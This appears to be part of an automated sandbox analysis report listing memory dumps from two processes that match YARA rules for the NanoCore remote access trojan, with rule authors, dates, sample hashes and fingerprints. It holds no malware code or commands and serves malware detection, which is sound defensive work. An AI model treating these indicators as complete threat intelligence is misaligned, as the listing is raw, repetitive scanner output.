Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
